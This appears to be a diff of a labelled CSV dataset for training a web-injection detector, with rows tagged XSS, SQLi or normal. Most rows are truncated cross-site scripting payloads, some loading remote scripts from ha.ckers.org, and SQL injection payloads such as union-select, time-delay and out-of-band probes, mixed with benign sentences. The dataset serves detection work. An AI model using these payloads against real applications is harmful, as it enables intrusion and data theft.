"<SCRIPT ""a='>'"" SRC=""http://ha.ckers.org/xss.js""><",1,XSS,828 -"Elijah Cummings, the top Democrat on the select Co",0,normal,26216 -Select the right playlist for the party.,0,normal,24175 -"{""id"":null,""name"":""goose""}",0,normal,27123 -1 where 4245 = 4245,2,SQLi,17369 -select * from users where id = 1 %!<1 or 1 = 1 -- ,2,SQLi,11474 -<textarea onblur=alert(1) id=x></textarea><input a,1,XSS,7784 -or SLEEP(5)--,2,SQLi,10381 -"{""id"":null,""firstName"":""Vanessa"",""lastName"":""Zhou""",0,normal,27049 -"<caption onmouseover=""alert(1)"">test</caption>",1,XSS,2444 -Select your request.,0,normal,24939 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10#",2,SQLi,10542 -"1%' ) ) ) union all select null,null,null,null,nul",2,SQLi,16730 +Early in the 15th century their residence was fixe,0,normal,26218 +Select the perfect gift for a family member.,0,normal,24177 +"{""id"":null,""name"":""Pignite""}",0,normal,27121 +select ( case when ( 5704 = 4125 ) then 5704 else ,2,SQLi,17371 +"select * from users where id = 1 or ""]1"" or 1 = 1 ",2,SQLi,11476 +"<rtc onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,7786 +waitfor delay '00:00:05'--,2,SQLi,10383 +"{""id"":null,""firstName"":""Ang"",""lastName"":""Freddie"",",0,normal,27046 +"<frame draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,2445 +Select your appeal.,0,normal,24941 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12#",2,SQLi,10544 +"-5597' ) or make_set ( 2490 = 2164,2164 )",2,SQLi,16732 "<LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/x",1,XSS,815 -Sort the colored beads.,0,normal,22551 -1' ) ) and 4386 = utl_inaddr.get_host_address ( ch,2,SQLi,13000 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,11398 -Article: Select items up to 25% off (through July ,0,normal,26356 -"{""id"":null,""name"":""society""}",0,normal,27317 -1 ) ) as zpvn where 2767 = 2767 rlike ( select ( c,2,SQLi,14154 -"1%' ) ) ) and updatexml ( 3393,concat ( 0x2e,0x717",2,SQLi,12299 -"<data onkeypress=""alert(1)"" contenteditable>test</",1,XSS,5780 -"<style>@keyframes x{}</style><svg style=""animation",1,XSS,2117 +Modify the recipe slightly.,0,normal,22553 +1'+ ( select sfuq where 8094 = 8094 procedure anal,2,SQLi,13002 +"or 1 = 1 or """" =",2,SQLi,11400 +"As an example, here are the steps for most Samsung",0,normal,26353 +"{""id"":null,""firstName"":""Leanne"",""lastName"":""Eran"",",0,normal,27316 +"1%' and elt ( 4249 = 4249,7259 ) and '%' = '",2,SQLi,14156 +"-1065 ) ) union all select 7437,7437,7437,7437,743",2,SQLi,12301 +<menuitem id=x tabindex=1 onactivate=alert(1)></me,1,XSS,5782 +"<plaintext onbeforecut=""alert(1)"" contenteditable>",1,XSS,2118 "<embed width=500 height=500 code=""data:text/html,<",1,XSS,794 -or ''=',2,SQLi,10148 -"<pre onmousemove=""alert(1)"">test</pre>",1,XSS,6899 -"<canvas draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,2675 -1' ) and ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,16479 -"-3672"" ) ) union all select 6093#",2,SQLi,15771 -select ( case when ( 8294 = 4332 ) then 1 else 829,2,SQLi,20610 -"<acronym onmouseenter=""alert(1)"">test</acronym>",1,XSS,3757 -<em onpointerout=alert(1)>XSS</em>,1,XSS,2892 -"1' ) ) ) procedure analyse ( extractvalue ( 9255,c",2,SQLi,18756 -"-3492"" where 4094 = 4094 or 3440 = cast ( ( chr ( ",2,SQLi,14383 --9562' or 8571 = 8571--,2,SQLi,20104 -<mark onpointermove=alert(1)>XSS</mark>,1,XSS,3229 -"<bdo draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,7864 -"<span onmousemove=""alert(1)"">test</span>",1,XSS,6360 -where,0,normal,26530 -I need to select the right words for the speech.,0,normal,23711 -1 ) where 1622 = 1622,2,SQLi,22413 -"1"" ) and ( select 9067 from ( select count ( * ) ,",2,SQLi,13430 -AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11105 --9893' or 4747 = dbms_utility.sqlid_to_sqlhash ( (,2,SQLi,18250 --8234' ) ) ) or 9323 = 9323#,2,SQLi,13947 -<acronym onpointerout=alert(1)>XSS</acronym>,1,XSS,4613 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,19030 -<legend onpointerup=alert(1)>XSS</legend>,1,XSS,2244 -"<progress onkeyup=""alert(1)"" contenteditable>test<",1,XSS,5374 -"<element oncut=""alert(1)"" contenteditable>test</el",1,XSS,2337 -1'|| ( select 'xglm' from dual where 3556 = 3556 o,2,SQLi,17335 -"1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(5))-- 13",2,SQLi,11261 -"<embed src=""data:text/html;base64,PHNjcmlwdD5hbGVy",1,XSS,1121 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10790 -"1%"" ) ) ) and 3202 = like ( 'abcdefg',upper ( hex ",2,SQLi,18589 +%20or%20x=x,2,SQLi,10150 +"<fieldset onmouseleave=""alert(1)"">test</fieldset>",1,XSS,6901 +"<colgroup draggable=""true"" ondragstart=""alert(1)"">",1,XSS,2676 +1'+ ( select iowv where 6105 = 6105 and sleep ( 5 ,2,SQLi,16481 +"select count ( * ) from generate_series ( 1,500000",2,SQLi,15773 +"1' ) and 2388 = benchmark ( 5000000,md5 ( 0x6d4571",2,SQLi,20612 +<blink onpointerout=alert(1)>XSS</blink>,1,XSS,3759 +"<ruby onkeyup=""alert(1)"" contenteditable>test</rub",1,XSS,2893 +call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,18758 +"1"" ) or 8384 = like ( 'abcdefg',upper ( hex ( rand",2,SQLi,14385 +"1%"" and ( 2850 = 6610 ) *6610 and ""%"" = """,2,SQLi,20106 +<samp onpointerover=alert(1)>XSS</samp>,1,XSS,3231 +<table onfocusout=alert(1) tabindex=1 id=x></table,1,XSS,7866 +<noframes onpointerdown=alert(1)>XSS</noframes>,1,XSS,6362 +where,0,normal,26527 +I want to choose a painting for the living room.,0,normal,23713 +"1"" ) ) union all select null,null#",2,SQLi,22415 +1' ) or sleep ( 5 ) and ( 'mdmr' like 'mdmr,2,SQLi,13432 +AND 1=utl_inaddr.get_host_address((SELECT DISTINCT,2,SQLi,11107 +"-7006' where 6966 = 6966 union all select 6966,696",2,SQLi,18252 +1' ) where 6305 = 6305 rlike ( select ( case when ,2,SQLi,13949 +<html onpointerleave=alert(1)>XSS</html>,1,XSS,4615 +-8023' or 6872 = 6872,2,SQLi,19032 +"<!--#exec cmd=""/bin/echo '<SCR'""--><!--#exec cmd=""",1,XSS,2245 +"<bdi onmouseenter=""alert(1)"">test</bdi>",1,XSS,5376 +"<datalist onmouseleave=""alert(1)"">test</datalist>",1,XSS,2338 +"-7544"" ) ) union all select 3808,3808,3808,3808--",2,SQLi,17337 +")) AS 1337 WHERE 1337=1337 AND ELT(1337=1337,SLEEP",2,SQLi,11263 +<script>({0:#0=alert/#0#/#0#(123)})</script>,1,XSS,1122 +"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10792 +"1"" ) ) rlike ( select * from ( select ( sleep ( 5 ",2,SQLi,18591 "<script charset=""\x22>javascript:alert(1)</script>",1,XSS,420 ‘; alert(1);,1,XSS,923 -javascript:javascript:alert(1),1,XSS,9447 -You'll then see a dialog box that allows you to se,0,normal,25054 -<fieldset onpointerdown=alert(1)>XSS</fieldset>,1,XSS,5409 -<style>:target {color: red;}</style><rp id=x style,1,XSS,5789 -"1 ) where 8671 = 8671 and make_set ( 4931 = 1642,1",2,SQLi,22127 -1 ) ) as juoe where 9994 = 9994 or 2367 = ( select,2,SQLi,15375 -Select a recipe for a special meal.,0,normal,24052 -1'+ ( select 'zkum' where 5161 = 5161 union all se,2,SQLi,21952 -Select shot.,0,normal,24520 --1166' ) ) as icdz where 1042 = 1042 union all sel,2,SQLi,17587 -"1%"" ) ) ) union all select null,null,null,null,nul",2,SQLi,22150 -<code id=x tabindex=1 onfocusin=alert(1)></code>,1,XSS,8390 -"<dl onbeforecopy=""alert(1)"" contenteditable>test</",1,XSS,1971 -"AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND 13",2,SQLi,11303 -<thead onblur=alert(1) tabindex=1 id=x></thead><in,1,XSS,4019 -"<em onkeydown=""alert(1)"" contenteditable>test</em>",1,XSS,3688 -"-4885 union all select 4589,4589,4589,4589,4589,45",2,SQLi,18382 -"1"" ) waitfor delay '0:0:5'--",2,SQLi,20418 -1' ) as dvoy where 7906 = 7906 and char ( 109 ) ||,2,SQLi,12791 -") AND ELT(1337=1337,SLEEP(5)) AND ('1337'='1337",2,SQLi,11247 -"g'""></IFRAME>Hover the cursor to the LEFT of this ",1,XSS,1249 -"<hgroup onkeyup=""alert(1)"" contenteditable>test</h",1,XSS,2193 -1' where 8360 = 8360 or 7427 = dbms_pipe.receive_m,2,SQLi,19097 -<html ontouchmove=alert(1)>,1,XSS,9185 -1' where 4134 = 4134 and 1102 = 6300--,2,SQLi,18575 -<sup onpointerout=alert(1)>XSS</sup>,1,XSS,4671 -"1"" ) ) ) and 6240 = ( 'qqpjq'|| ( select case 6240",2,SQLi,21527 -"<SCRIPT SRC=""http://.rocks/.jpg""></SCRIPT>",1,XSS,5985 -"<ins onbeforecut=""alert(1)"" contenteditable>test</",1,XSS,6566 -<isindex id=x tabindex=1 onfocusin=alert(1)></isin,1,XSS,7805 -"select * from users where id = 1 or 1#""1 union sel",2,SQLi,11955 -"<html draggable=""true"" ondragend=""alert(1)"">test</",1,XSS,6944 -"javascript:""/*\""/*'/*`/*--></noembed></template></",1,XSS,9511 -"UNION ALL SELECT 1,2,3,4#",2,SQLi,10536 -"-1055' union all select 7758,7758,7758,7758,7758,7",2,SQLi,18521 -1'+ ( select ankx where 6789 = 6789,2,SQLi,17450 -"1 ) ) ) and elt ( 1210 = 1210,sleep ( 5 ) ) and ( ",2,SQLi,14061 -"1%"" ) union all select null,null,null,null,null,nu",2,SQLi,16985 -"1' ) and 2388 = benchmark ( 5000000,md5 ( 0x6d4571",2,SQLi,20612 -<cite onpointerup=alert(1)>XSS</cite>,1,XSS,7578 +</title><script>alert(1);</script>,1,XSS,9449 +"You select your region of Kenya, select an animal ",0,normal,25056 +"<b onmouseover=""alert(1)"">test</b>",1,XSS,5411 +<input4 onpointerover=alert(1)>XSS</input4>,1,XSS,5791 +-2431' ) or 8571 = 8571--,2,SQLi,22129 +1' where 3701 = 3701 and 2006 = 2006,2,SQLi,15377 +Select the best lens for capturing moments.,0,normal,24054 +-9445 ) as dmur where 4371 = 4371 union all select,2,SQLi,21954 +Select bottle.,0,normal,24522 +1 where 2672 = 2672 and 1819 = 4322#,2,SQLi,17589 +"1"" where 5517 = 5517 and 7756 = dbms_utility.sqlid",2,SQLi,22152 +<menuitem onfocusout=alert(1) tabindex=1 id=x></me,1,XSS,8392 +"<param onmousemove=""alert(1)"">test</param>",1,XSS,1972 +")) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND",2,SQLi,11305 +"<multicol onmouseout=""alert(1)"">test</multicol>",1,XSS,4021 +<svg onblur=alert(1) tabindex=1 id=x></svg><input ,1,XSS,3690 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,18384 +end and ( ( ( 'gqhc' = 'gqhc,2,SQLi,20420 +call regexp_substring ( repeat ( right ( char ( 37,2,SQLi,12793 +"))) AND ELT(1337=1337,SLEEP(5)) AND ((('1337'='133",2,SQLi,11249 +"<IFRAME width=""420"" height=""315"" frameborder=""0"" o",1,XSS,1250 +"<body draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,2194 +1' ) as tqdg where 9355 = 9355,2,SQLi,19099 +"<html xmlns=""http://www.w3.org/1999/xhtml"">",1,XSS,9187 +"-1598"" ) ) or elt ( 5329 = 9628,9628 ) and ( ( ""hy",2,SQLi,18577 +"<tfoot onmouseup=""alert(1)"">test</tfoot>",1,XSS,4673 +"1%"" union all select null,null,null,null,null,null",2,SQLi,21529 +<svg><time onload=alert(1)></time>,1,XSS,5987 +<rb onpointerup=alert(1)>XSS</rb>,1,XSS,6568 +"<progress draggable=""true"" ondragend=""alert(1)"">te",1,XSS,7807 +""" ) or ( ""x"" ) = ( ""x",2,SQLi,11957 +"<embed onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,6946 +"javascript:""/*\""/*'/*--></title></textarea></style",1,XSS,9513 +"UNION ALL SELECT 1,2,3,4,5,6#",2,SQLi,10538 +"1' where 8451 = 8451 union all select null,null,nu",2,SQLi,18523 +"1' ) ) as sxpk where 5524 = 5524 and row ( 6237,74",2,SQLi,17452 +"1%"" ) ) ) and 4386 = utl_inaddr.get_host_address (",2,SQLi,14063 +"-9237' ) union all select 7454,7454,7454,7454,7454",2,SQLi,16987 +"1' ) and updatexml ( 3393,concat ( 0x2e,0x7171706a",2,SQLi,20614 +"<keygen oncopy=""alert(1)"" contenteditable>test</ke",1,XSS,7580 "<xss onmousemove=""alert(1)"" style=display:block>te",1,XSS,78 -Let's explore where the hiking trail ends.,0,normal,23931 -1' ) ) and 6414 = ( select count ( * ) from rdb$fi,2,SQLi,19283 -1' ) or 4411 = ( select count ( * ) from sysusers ,2,SQLi,15525 -1'+ ( select yjtm where 3965 = 3965 and 9389 = 344,2,SQLi,21205 -Mark Warner's position on the Senate Select Commit,0,normal,25891 -Group data where necessary.,0,normal,23326 -Join for dinner.,0,normal,22798 -"Once you select Grayscale, your screen will immedi",0,normal,25829 -"<a id=""x""><rect fill=""white"" width=""1000"" height=""",1,XSS,9065 -<style>:target {color:red;}</style><rb id=x style=,1,XSS,8008 -1' where 5458 = 5458 rlike ( select * from ( selec,2,SQLi,21853 -"<wbr draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5952 -1 and sleep(5)--,2,SQLi,11158 -"<code onmousemove=""alert(1)"">test</code>",1,XSS,3392 -"<applet onmousedown=""alert(1)"">test</applet>",1,XSS,5416 -1%' ) ) and 1651 = 9324 and ( ( '%' = ',2,SQLi,18945 -"Get an extra 15% off select furniture by Corvus, a",0,normal,26147 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8163 -1' ) ) as fcjk where 7755 = 7755,2,SQLi,19020 -"<param onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,5257 -<style>:target {transform: rotate(180deg);}</style,1,XSS,3531 -"<plaintext onmouseenter=""alert(1)"">test</plaintext",1,XSS,8568 -"<mark draggable=""true"" ondragleave=""alert(1)"">test",1,XSS,1909 -select,0,normal,26620 +Where's the best place to capture the sunset?,0,normal,23933 +"1"" ) where 6679 = 6679 rlike sleep ( 5 ) #",2,SQLi,19285 +1' ) union all select null#,2,SQLi,15527 +"1' ) procedure analyse ( extractvalue ( 9255,conca",2,SQLi,21207 +Mark & Graham: Up to 503% off select home and outd,0,normal,25893 +Join tables where applicable.,0,normal,23328 +Create a story.,0,normal,22800 +"Once you learn how to do this, friends and colleag",0,normal,25831 +"<a target=""x"" href=""xssme?xss=<script>find('cookie",1,XSS,9067 +"<small draggable=""true"" ondragstart=""alert(1)"">tes",1,XSS,8010 +select ( case when ( 6652 = 1932 ) then 6652 else ,2,SQLi,21855 +"<acronym onmouseover=""alert(1)"">test</acronym>",1,XSS,5954 +and sleep 5--,2,SQLi,11160 +<svg><td onload=alert(1)></td>,1,XSS,3394 +<isindex id=x tabindex=1 onbeforedeactivate=alert(,1,XSS,5418 +1 ) ) as pynj where 7683 = 7683 waitfor delay '0:0,2,SQLi,18947 +"Get 30 percent off select fashion items including,",0,normal,26149 +"<span draggable=""true"" ondrag=""alert(1)"">test</spa",1,XSS,8165 +"1"" ) ) and 4595 = 4595#",2,SQLi,19022 +<frameset id=x tabindex=1 onfocus=alert(1)></frame,1,XSS,5259 +<xmp onpointermove=alert(1)>XSS</xmp>,1,XSS,3533 +"<input onmousemove=""alert(1)"">test</input>",1,XSS,8570 +"<em onbeforepaste=""alert(1)"" contenteditable>test<",1,XSS,1910 +select,0,normal,26617 "<!-- ><img title=""--><iframe/onload=alert(1)>""> --",1,XSS,236 -"-7371' ) union all select 4531,4531,4531#",2,SQLi,12220 -"-5652%' ) union all select 4447,4447,4447,4447,444",2,SQLi,17989 -<style>:target {color:red;}</style><strike id=x st,1,XSS,7985 -<svg onload=(alert)(1)>,1,XSS,9311 -<html id=x tabindex=1 ondeactivate=alert(1)></html,1,XSS,3491 -1%' ) ) or 2367 = ( select count ( * ) from rdb$fi,2,SQLi,14232 --3059' ) as jhbh where 4056 = 4056 or ( 3498 = 696,2,SQLi,18379 -"1"" ) ) ) union all select null,null,null--",2,SQLi,19209 -1,0,normal,26652 -"UNION ALL SELECT 1,2,3,4,5,6,7--",2,SQLi,10569 -"!--"" /><script>alert('xss');</script>",1,XSS,1343 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8513 -"<;META HTTP-EQUIV="";Link""; Content="";<;http://ha.c",1,XSS,1620 -"<menuitem onmousedown=""alert(1)"">test</menuitem>",1,XSS,5288 --3821' ) or 9323 = 9323#,2,SQLi,18445 -"<menu onmouseover=""alert(1)"">test</menu>",1,XSS,7042 -<iframe onpointerleave=alert(1)>XSS</iframe>,1,XSS,2220 -"?clickTAG=javascript:alert(1)&TargetAS="",",1,XSS,9866 -1 where 4985 = 4985 order by 1#,2,SQLi,22423 -1'+ ( select 'stsu' where 2386 = 2386 or sleep ( 5,2,SQLi,16645 -"{""id"":null,""name"":""enough""}",0,normal,26764 -1' ) as rqzz where 4987 = 4987 or char ( 68 ) ||ch,2,SQLi,12978 -The case concerned whether Select Comfort violated,0,normal,25478 -"1%"" ) ) ) or 4240 = ( select 4240 from pg_sleep ( ",2,SQLi,20129 -"1 and ( select 9067 from ( select count ( * ) ,con",2,SQLi,14595 -1 ) ) and 2716 = ( select count ( * ) from sysuser,2,SQLi,18411 -"<tr onmousedown=""alert(1)"">test</tr>",1,XSS,6989 -"-2321%"" ) or 2271 = 7683--",2,SQLi,20619 -<details onblur=alert(1) tabindex=1 id=x></details,1,XSS,1918 -<style>:target {color:red;}</style><slot id=x styl,1,XSS,1829 -"<t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT",1,XSS,9766 -1 ) where 7680 = 7680 and 7756 = dbms_utility.sqli,2,SQLi,12608 -( select * from ( select ( sleep ( 5 ) ) ) srmq ) ,2,SQLi,12942 -<discard onpointerover=alert(1)>XSS</discard>,1,XSS,6234 -1,0,normal,26719 -"<code draggable=""true"" ondrag=""alert(1)"">test</cod",1,XSS,6284 -"<title onbeforecopy=""alert(1)"" contenteditable>tes",1,XSS,4209 -"1"" ) ) as ljhz where 2416 = 2416",2,SQLi,12820 -1' ) ) waitfor delay '0:0:5' and ( ( 'amnf' like ',2,SQLi,16609 -This helps Dorita select the highest quality milk ,0,normal,25300 -Also prepare a list of questions you'd like answer,0,normal,26387 -<x 1='1'onxxx=1,1,XSS,9334 -"<bdo onmouseover=""alert(1)"">test</bdo>",1,XSS,6470 -"{""id"":null,""firstName"":""Evon"",""lastName"":""Choong"",",0,normal,26827 --4057' ) order by 1#,2,SQLi,13747 --2207%' ) or ( 8459 = 8459 ) *4906 and ( '%' = ',2,SQLi,15386 -1 ) where 8375 = 8375,2,SQLi,13704 -"""+if(benchmark(3000000,MD5(1)),NULL,NULL))%20%23",2,SQLi,10955 -"</script><img/*%00/src=""worksinchrome&colon;prompt",1,XSS,847 -1' ) where 5540 = 5540 waitfor delay '0:0:5'--,2,SQLi,20674 -<element onpointerout=alert(1)>XSS</element>,1,XSS,5561 -"-4592"" ) ) or 4493 = utl_inaddr.get_host_address (",2,SQLi,13235 -"1"" where 9973 = 9973 and 2006 = 2006",2,SQLi,14310 --1385' ) ) ) or 5903 = ( 'qqpjq'|| ( select case 5,2,SQLi,18936 -1' in boolean mode ) or char ( 75 ) ||char ( 70 ) ,2,SQLi,13918 -"<title><img title=""</title><img src onerror=alert(",1,XSS,118 -"<STYLE>.{background-image:url(""javascript:alert(''",1,XSS,8838 -"-4373%"" ) ) or 5672 = 5188--",2,SQLi,22351 -Select refuse.,0,normal,24580 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14044 -<legend id=x tabindex=1 onfocus=alert(1)></legend>,1,XSS,8660 -Where's the best place to take a stroll?,0,normal,23874 -"1"" ) and row ( 6237,7469 ) > ( select count ( * ) ",2,SQLi,16390 -"<style>@keyframes x{}</style><basefont style=""anim",1,XSS,5343 -"<div id=""123""><span class=foo>Some text</span>",1,XSS,9112 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10788 -<image src=validimage.png onloadstart=alert(1)>,1,XSS,4325 -"-2007%' ) ) union all select 7298,7298,7298#",2,SQLi,17448 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,2591 -Select the dessert.,0,normal,24819 -1'+ ( select ttae where 4601 = 4601 or 2633 = dbms,2,SQLi,13047 -S. purchases for advertising in select media (onli,0,normal,25737 -1' ) and ( select * from ( select ( sleep ( 5 ) ) ,2,SQLi,20120 -"1"" and 8514 = ( select count ( * ) from domain.dom",2,SQLi,13919 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10590 -"1 ) ) ) union all select null,null,null,null,null,",2,SQLi,19902 -Where should I insert data?,0,normal,23371 -"select * from users where id = '1' union select ""?",2,SQLi,11614 -<span id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,6768 -"<dd draggable=""true"" ondragenter=""alert(1)"">test</",1,XSS,5623 -"<;META HTTP-EQUIV="";refresh""; CONTENT="";0; URL=htt",1,XSS,1606 -"1%"" or 2633 = dbms_pipe.receive_message ( chr ( 11",2,SQLi,18118 -1,0,normal,26731 -Mary and the Witch's Flower is out now in select t,0,normal,25889 -"<bdi draggable=""true"" ondragstart=""alert(1)"">test<",1,XSS,3813 -"1' or 8466 = benchmark ( 5000000,md5 ( 0x694a4745 ",2,SQLi,14278 -1' where 9242 = 9242,2,SQLi,17261 -"UNION ALL SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,",2,SQLi,10555 -; exec ('sel' + 'ect us' + 'er'),2,SQLi,10168 -"<strong draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,1762 -1 ) or 6793 = ( select 6793 from pg_sleep ( 5 ) ) ,2,SQLi,15680 -1 and 8407 = ( select count ( * ) from generate_se,2,SQLi,21786 -"1"" ) and 8677 = 9054#",2,SQLi,19124 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,2473 -1' where 7828 = 7828 or 4240 = ( select 4240 from ,2,SQLi,15914 -"<map oncopy=""alert(1)"" contenteditable>test</map>",1,XSS,6739 -Sort results where needed.,0,normal,23276 -1'|| ( select 'ryyc' from dual where 5196 = 5196 o,2,SQLi,15729 -"-3707"" ) ) ) or 8571 = 8571--",2,SQLi,12200 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,7944 -"-7272"" ) union all select 9163,9163,9163,9163,9163",2,SQLi,12911 -call regexp_substring ( repeat ( left ( crypt_key ,2,SQLi,14370 -I look forward to the definitive report Chairman G,0,normal,26070 -1' where 4253 = 4253,2,SQLi,20591 -"<rt oncut=""alert(1)"" contenteditable>test</rt>",1,XSS,6372 -Riders in select cities will be invited to partici,0,normal,25746 --2418'|| ( select 'mdbt' from dual where 3026 = 30,2,SQLi,16617 -<col onpointerover=alert(1)>XSS</col>,1,XSS,8259 -"<big onmouseout=""alert(1)"">test</big>",1,XSS,7562 -><script+src=https://suggest-shop.yahooapis.jp/Sho,1,XSS,9796 -<bdo id=x tabindex=1 onfocusin=alert(1)></bdo>,1,XSS,6169 -"select * from users where id = 1 or ""]1"" or 1 = 1 ",2,SQLi,11476 -"<area onmouseup=""alert(1)"">test</area>",1,XSS,3597 -"<rt onmouseleave=""alert(1)"">test</rt>",1,XSS,6289 -"<link oncopy=""alert(1)"" contenteditable>test</link",1,XSS,4633 -1'+ ( select qpaf where 7859 = 7859 or ( select * ,2,SQLi,15148 -select dbms_pipe.receive_message ( chr ( 66 ) ||ch,2,SQLi,16510 -Select a book for your reading list.,0,normal,24026 -<map onpointerenter=alert(1)>XSS</map>,1,XSS,6230 -"1"" ) ) as hfma where 2654 = 2654 and make_set ( 84",2,SQLi,17681 -1'|| ( select 'mwpd' where 2887 = 2887,2,SQLi,18361 -"{""id"":null,""firstName"":""Jeff"",""lastName"":""Lam Tian",0,normal,26915 -"{""id"":null,""firstName"":""Adrian"",""lastName"":""Khong""",0,normal,26859 -ORDER BY 26--,2,SQLi,10268 --7758%' ) ) ) or 3038 = 3038,2,SQLi,12773 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5751 -<track id=x tabindex=1 onfocus=alert(1)></track>,1,XSS,8153 -"1"" ) ) as ktue where 6392 = 6392 and 8514 = ( sele",2,SQLi,13504 -"<var onkeydown=""alert(1)"" contenteditable>test</va",1,XSS,3087 -<th id=x tabindex=1 onbeforeactivate=alert(1)></th,1,XSS,1907 -"<div oncut=""alert(1)"" contenteditable>test</div>",1,XSS,6883 +1 ) ) ) or 9643 = ( select count ( * ) from domain,2,SQLi,12222 +"1' or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,17991 +"<menu onmouseleave=""alert(1)"">test</menu>",1,XSS,7987 +"<svg xmlns=""http://www.w3.org/2000/svg"" onload=""al",1,XSS,9313 +"<address onmouseenter=""alert(1)"">test</address>",1,XSS,3493 +1 ) and 8407 = ( select count ( * ) from generate_,2,SQLi,14234 +"1"" or 5356 = ( select count ( * ) from sysusers as",2,SQLi,18381 +"1"" where 8635 = 8635 and 4595 = 4595#",2,SQLi,19211 +"{""id"":null,""firstName"":""Donavan"",""lastName"":""Chang",0,normal,27038 +"UNION ALL SELECT 1,2,3,4,5,6,7,8,9--",2,SQLi,10571 +"<script>alert(""XSS by \nxss"")</script><marquee><h1",1,XSS,1344 +"<pre onmousedown=""alert(1)"">test</pre>",1,XSS,8515 +"<;STYLE>;BODY{-moz-binding:url("";http://ha.ckers.o",1,XSS,1621 +"<figure draggable=""true"" ondragend=""alert(1)"">test",1,XSS,5290 +1' where 5035 = 5035 and 8594 = ( select 8594 from,2,SQLi,18447 +"<i oncopy=""alert(1)"" contenteditable>test</i>",1,XSS,7044 +"<cite oncontextmenu=""alert(1)"">test</cite>",1,XSS,2221 +"?skinName=asfunction:getURL,javascript:alert(1)//""",1,XSS,9868 +"-6363"" ) where 4043 = 4043 union all select 4043,4",2,SQLi,22425 +-5470' ) ) or ( 8459 = 8459 ) *4906 and ( ( 'oeam',2,SQLi,16647 +"{""id"":null,""name"":""meet""}",0,normal,26761 +1'+ ( select ophz where 9158 = 9158 rlike ( select,2,SQLi,12980 +The best way of deducing r„ is to select portions ,0,normal,25480 +"1' ) ) ) procedure analyse ( extractvalue ( 5840,c",2,SQLi,20131 +"-4966%"" union all select 4300,4300,4300,4300,4300,",2,SQLi,14597 +"-4379' union all select 1648,1648,1648,1648,1648,1",2,SQLi,18413 +"<strike draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,6991 +"1' ) where 8628 = 8628 union all select null,null,",2,SQLi,20621 +"<acronym onmousemove=""alert(1)"">test</acronym>",1,XSS,1919 +"<applet onmouseover=""alert(1)"">test</applet>",1,XSS,1830 +&#60;,1,XSS,9768 +1' ) ) or ( select 9173 from ( select count ( * ) ,2,SQLi,12610 +select ( case when ( 8820 = 4648 ) then 8820 else ,2,SQLi,12944 +"<xmp onkeydown=""alert(1)"" contenteditable>test</xm",1,XSS,6236 +1,0,normal,26716 +<svg><rp onload=alert(1)></rp>,1,XSS,6286 +"<ins onmousemove=""alert(1)"">test</ins>",1,XSS,4211 +"1"" ) ) ) or ( select * from ( select ( sleep ( 5 )",2,SQLi,12822 +"-7379 union all select 9813,9813,9813,9813,9813,98",2,SQLi,16611 +This formerly led to purely political appointments,0,normal,25302 +Also available at Redbox and On Demand through sel,0,normal,26389 +<x contenteditable onblur=alert(1)>lose focus!,1,XSS,9336 +"<hr onkeyup=""alert(1)"" contenteditable>test</hr>",1,XSS,6472 +"{""id"":null,""name"":""Lickitung""}",0,normal,26824 +-3462 ) ) as biyl where 5143 = 5143 union all sele,2,SQLi,13749 +1' ) rlike ( select * from ( select ( sleep ( 5 ) ,2,SQLi,15388 +1' order by 1--,2,SQLi,13706 +#ERROR!,2,SQLi,10957 +"</script><img/*%00/src=""worksinchrome&colon;prompt",1,XSS,847 +1'+ ( select lptb where 3861 = 3861 or sleep ( 5 ),2,SQLi,20676 +<style>:target {color:red;}</style><xmp id=x style,1,XSS,5563 +1' ) ) ) or 9643 = ( select count ( * ) from domai,2,SQLi,13237 +"1' ) ) union all select null,null,null,null--",2,SQLi,14312 +1'+ ( select 'tbfj' where 4016 = 4016,2,SQLi,18938 +"1"" ) as giqb where 4664 = 4664",2,SQLi,13920 +"<title><img title=""</title><img src onerror=alert(",1,XSS,118 +"<output onbeforecopy=""alert(1)"" contenteditable>te",1,XSS,8840 +1' rlike sleep ( 5 ) and 'ojqz' like 'ojqz,2,SQLi,22353 +Select exit.,0,normal,24582 +1%' rlike sleep ( 5 ) #,2,SQLi,14046 +<hgroup onpointerup=alert(1)>XSS</hgroup>,1,XSS,8662 +I need to decide where to dine this evening.,0,normal,23876 +"select sleep ( 5 ) and ( ( ""wueo"" = ""wueo",2,SQLi,16392 +<ruby onpointerout=alert(1)>XSS</ruby>,1,XSS,5345 +"<div id=""125""><?xml version=""1.0""?>",1,XSS,9114 